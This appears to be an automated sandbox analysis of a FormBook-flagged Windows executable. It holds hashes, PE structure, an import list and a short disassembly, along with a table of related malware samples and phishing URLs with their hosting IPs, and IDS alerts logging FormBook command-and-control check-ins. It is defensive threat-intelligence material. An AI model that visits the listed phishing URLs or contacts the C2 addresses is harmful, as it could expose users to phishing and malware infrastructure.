POWERLINE-AS-APPOWERLINEDATACENTERHK | Ponta Saheb. PO 4400049817.exe | Get hash | malicious | FormBook | Browse | 160.124.134.116
POWERLINE-AS-APPOWERLINEDATACENTERHK | .main.elf | Get hash | malicious | Xmrig | Browse | 154.213.192.3
POWERLINE-AS-APPOWERLINEDATACENTERHK | v6pwbOEUpl.elf | Get hash | malicious | Unknown | Browse | 154.92.66.248
POWERLINE-AS-APPOWERLINEDATACENTERHK | x86_64.elf | Get hash | malicious | Mirai | Browse | 156.251.3.9
NTT-LT-ASLT | ch89yHIa99.exe | Get hash | malicious | Ducktail | Browse | 84.32.84.33
NTT-LT-ASLT | ub7ZX9i3k6.exe | Get hash | malicious | Ducktail | Browse | 84.32.84.33
NTT-LT-ASLT | uupEsxBhAI.exe | Get hash | malicious | Ducktail | Browse | 84.32.84.33
NTT-LT-ASLT | yfM67N9UUL.exe | Get hash | malicious | Ducktail | Browse | 84.32.84.33
NTT-LT-ASLT | Y7isAhMKal.exe | Get hash | malicious | FormBook | Browse | 84.32.84.32
NTT-LT-ASLT | proforma Invoice.exe | Get hash | malicious | FormBook | Browse | 84.32.84.32
NTT-LT-ASLT | Wc7HGBGZfE.exe | Get hash | malicious | FormBook | Browse | 84.32.84.32
NTT-LT-ASLT | FmmYUD4pt7.wsf | Get hash | malicious | Unknown | Browse | 84.32.84.136
NTT-LT-ASLT | icRicpJWczmiOf8.exe | Get hash | malicious | FormBook | Browse | 84.32.84.32
NTT-LT-ASLT | https://ohpky5.fj78.fdske.com/e/c/01jbx9w45rt8n7dv9hga5bx34b/01jbx9w45rt8n7dv9hgd1yw31d | Get hash | malicious | Unknown | Browse | 84.32.84.121
ONEANDONE-ASBrauerstrasse48DE | https://google.com:login@login-zendesk-account.servz.com.pk/index.html | Get hash | malicious | HTMLPhisher | Browse | 212.227.67.33
ONEANDONE-ASBrauerstrasse48DE | sora.ppc.elf | Get hash | malicious | Unknown | Browse | 195.20.246.173
ONEANDONE-ASBrauerstrasse48DE | 3NvALxFlHV.exe | Get hash | malicious | FormBook | Browse | 217.160.0.93
ONEANDONE-ASBrauerstrasse48DE | file.exe | Get hash | malicious | Unknown | Browse | 74.208.236.140
ONEANDONE-ASBrauerstrasse48DE | file.exe | Get hash | malicious | Unknown | Browse | 74.208.236.140
ONEANDONE-ASBrauerstrasse48DE | Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe | Get hash | malicious | FormBook, GuLoader | Browse | 217.160.0.132
ONEANDONE-ASBrauerstrasse48DE | http://www.intelliclicksoftware.net/clicktrack2/click.aspx?ActionType=CreateHistory&CustomerID=GM-CSATRANS&ParentRecordID=&Campaign=Thank%20You%20For%20Your%20Business%20SR&Name=&Company=&Phone=&Email=&Subject=Click%20Through&WebNav=True&URL=http://johnvugrin.com | Get hash | malicious | HTMLPhisher | Browse | 74.208.239.192
ONEANDONE-ASBrauerstrasse48DE | unb4AWV6Fe.exe | Get hash | malicious | FormBook | Browse | 212.227.247.44
ONEANDONE-ASBrauerstrasse48DE | FzmC0FwV6y.exe | Get hash | malicious | FormBook | Browse | 217.160.0.142
ONEANDONE-ASBrauerstrasse48DE | Shipping documents..exe | Get hash | malicious | FormBook | Browse | 217.76.156.252
CONFLUENCE-NETWORK-INCVG | Hesap.exe | Get hash | malicious | FormBook | Browse | 208.91.197.27
CONFLUENCE-NETWORK-INCVG | XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse | 208.91.197.27
CONFLUENCE-NETWORK-INCVG | D7R Image_capture 28082024 JPEG FILE.exe | Get hash | malicious | FormBook | Browse | 208.91.197.27
CONFLUENCE-NETWORK-INCVG | ffsBbRe8UN.exe | Get hash | malicious | FormBook | Browse | 208.91.197.27
CONFLUENCE-NETWORK-INCVG | QNBSWIFT.exe | Get hash | malicious | FormBook | Browse | 208.91.197.27
CONFLUENCE-NETWORK-INCVG | Stadigheder43.exe | Get hash | malicious | FormBook, GuLoader | Browse | 66.81.203.200
CONFLUENCE-NETWORK-INCVG | Viridine84.exe | Get hash | malicious | FormBook, GuLoader | Browse | 208.91.197.27
CONFLUENCE-NETWORK-INCVG | SGS-Report0201024.xla.xlsx | Get hash | malicious | FormBook | Browse | 208.91.197.27
CONFLUENCE-NETWORK-INCVG | Invoice.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 208.91.197.27
CONFLUENCE-NETWORK-INCVG | rHSBCBank_Paymentswiftcpy.exe | Get hash | malicious | FormBook | Browse | 208.91.197.27
                                                                      No context
                                                                      No context
                                                                      Process:C:\Windows\SysWOW64\RpcPing.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Process:C:\Users\user\Desktop\xBzBOQwywT.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):288256
                                                                      Entropy (8bit):7.995224158142
                                                                      Encrypted:true
                                                                      SSDEEP:6144:+bB2xfPwkPHnFW3RYb5aHiZ5RefBdtSajTX6A4Bp4fPu8ynNDSGQU:+bUx3wkfnFWXiPRevDM4fanJSG/
                                                                      MD5:53BA17D083E2CEE6D7792DAD774DE28C
                                                                      SHA1:2583E56C7CB57EC92113B48584508C1CE45C9DE8
                                                                      SHA-256:CCB8EB6A0DE026995A685E52B80238B7C3F3798982CB88F6D0815693968D2F51
                                                                      SHA-512:43CEBD5003106D68DC88D766003E3202214FF362403B1416D3AE6772BBADC21894D8F9C57A1A5ADDC0CA5B95984F1D31A2FE02CE1E6451DF10FF2B47C7501222
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.5247721235195915
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:xBzBOQwywT.exe
                                                                      File size:1'332'289 bytes
                                                                      MD5:715ec2a53173921888b38c9731ad9bc9
                                                                      SHA1:710e6e31cbee07deb127ac9b70a4b1a31cc498f3
                                                                      SHA256:648cf23613834f4fba89ced0a881139a1883bf00c1c12172fbc7ee53a143e5ef
                                                                      SHA512:e5da1ed4b05c37e0692806e6f4fd5aba23f300c7c6e5caa9ac32f7c3dc49a64d26a52b44987376b65afd522888e1f2c34666d394ae7520125e6e15d6c33f83fc
                                                                      SSDEEP:24576:uRmJkcoQricOIQxiZY1iaC3qMDR35EktuWjfj2q+XRrtdNaAgz2JHJ:7JZoQrbTFZY1iaC3qhktuUjn+BwAQ21J
                                                                      TLSH:8955E122B5D69036C2B333B19E7FF765963D69360336D29B23C82D215EA05816B39733
                                                                      Icon Hash:1733312925935517
                                                                      Entrypoint:0x4165c1
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:0
                                                                      File Version Major:5
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                      Instruction
                                                                      call 00007FF54D19E1ABh
                                                                      jmp 00007FF54D19501Eh
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      push edi
                                                                      push esi
                                                                      mov esi, dword ptr [ebp+0Ch]
                                                                      mov ecx, dword ptr [ebp+10h]
                                                                      mov edi, dword ptr [ebp+08h]
                                                                      mov eax, ecx
                                                                      mov edx, ecx
                                                                      add eax, esi
                                                                      cmp edi, esi
                                                                      jbe 00007FF54D19519Ah
                                                                      cmp edi, eax
                                                                      jc 00007FF54D195336h
                                                                      cmp ecx, 00000080h
                                                                      jc 00007FF54D1951AEh
                                                                      cmp dword ptr [004A9724h], 00000000h
                                                                      je 00007FF54D1951A5h
                                                                      push edi
                                                                      push esi
                                                                      and edi, 0Fh
                                                                      and esi, 0Fh
                                                                      cmp edi, esi
                                                                      pop esi
                                                                      pop edi
                                                                      jne 00007FF54D195197h
                                                                      jmp 00007FF54D195572h
                                                                      test edi, 00000003h
                                                                      jne 00007FF54D1951A6h
                                                                      shr ecx, 02h
                                                                      and edx, 03h
                                                                      cmp ecx, 08h
                                                                      jc 00007FF54D1951BBh
                                                                      rep movsd
                                                                      jmp dword ptr [00416740h+edx*4]
                                                                      mov eax, edi
                                                                      mov edx, 00000003h
                                                                      sub ecx, 04h
                                                                      jc 00007FF54D19519Eh
                                                                      and eax, 03h
                                                                      add ecx, eax
                                                                      jmp dword ptr [00416654h+eax*4]
                                                                      jmp dword ptr [00416750h+ecx*4]
                                                                      nop
                                                                      jmp dword ptr [004166D4h+ecx*4]
                                                                      nop
                                                                      inc cx
                                                                      add byte ptr [eax-4BFFBE9Ah], dl
                                                                      inc cx
                                                                      add byte ptr [ebx], ah
                                                                      ror dword ptr [edx-75F877FAh], 1
                                                                      inc esi
                                                                      add dword ptr [eax+468A0147h], ecx
                                                                      add al, cl
                                                                      jmp 00007FF54F60D997h
                                                                      add esi, 03h
                                                                      add edi, 03h
                                                                      cmp ecx, 08h
                                                                      jc 00007FF54D19515Eh
                                                                      rep movsd
                                                                      jmp dword ptr [00000000h+edx*4]
                                                                      Programming Language:
                                                                      • [ C ] VS2010 SP1 build 40219
                                                                      • [C++] VS2010 SP1 build 40219
                                                                      • [ C ] VS2008 SP1 build 30729
                                                                      • [IMP] VS2008 SP1 build 30729
                                                                      • [ASM] VS2010 SP1 build 40219
                                                                      • [RES] VS2010 SP1 build 40219
                                                                      • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-07T15:27:11.595847+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.175.87.197 | 443 | 192.168.2.8 | 49704 | TCP
2024-11-07T15:27:37.582756+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49710 | 3.33.130.190 | 80 | TCP
2024-11-07T15:27:37.582756+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49710 | 3.33.130.190 | 80 | TCP
2024-11-07T15:27:50.811528+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.175.87.197 | 443 | 192.168.2.8 | 49711 | TCP
2024-11-07T15:27:53.493743+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49712 | 74.208.236.25 | 80 | TCP
2024-11-07T15:27:55.903448+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49713 | 74.208.236.25 | 80 | TCP
2024-11-07T15:27:58.408291+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49714 | 74.208.236.25 | 80 | TCP
2024-11-07T15:28:00.989412+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49715 | 74.208.236.25 | 80 | TCP
2024-11-07T15:28:00.989412+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49715 | 74.208.236.25 | 80 | TCP
2024-11-07T15:28:06.681366+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49727 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:09.292827+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49742 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:11.773840+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49758 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:14.389343+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49775 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:14.389343+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49775 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:20.067997+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49807 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:22.624290+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49822 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:25.156568+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49838 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:27.776036+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49851 | 3.33.130.190 | 80 | TCP
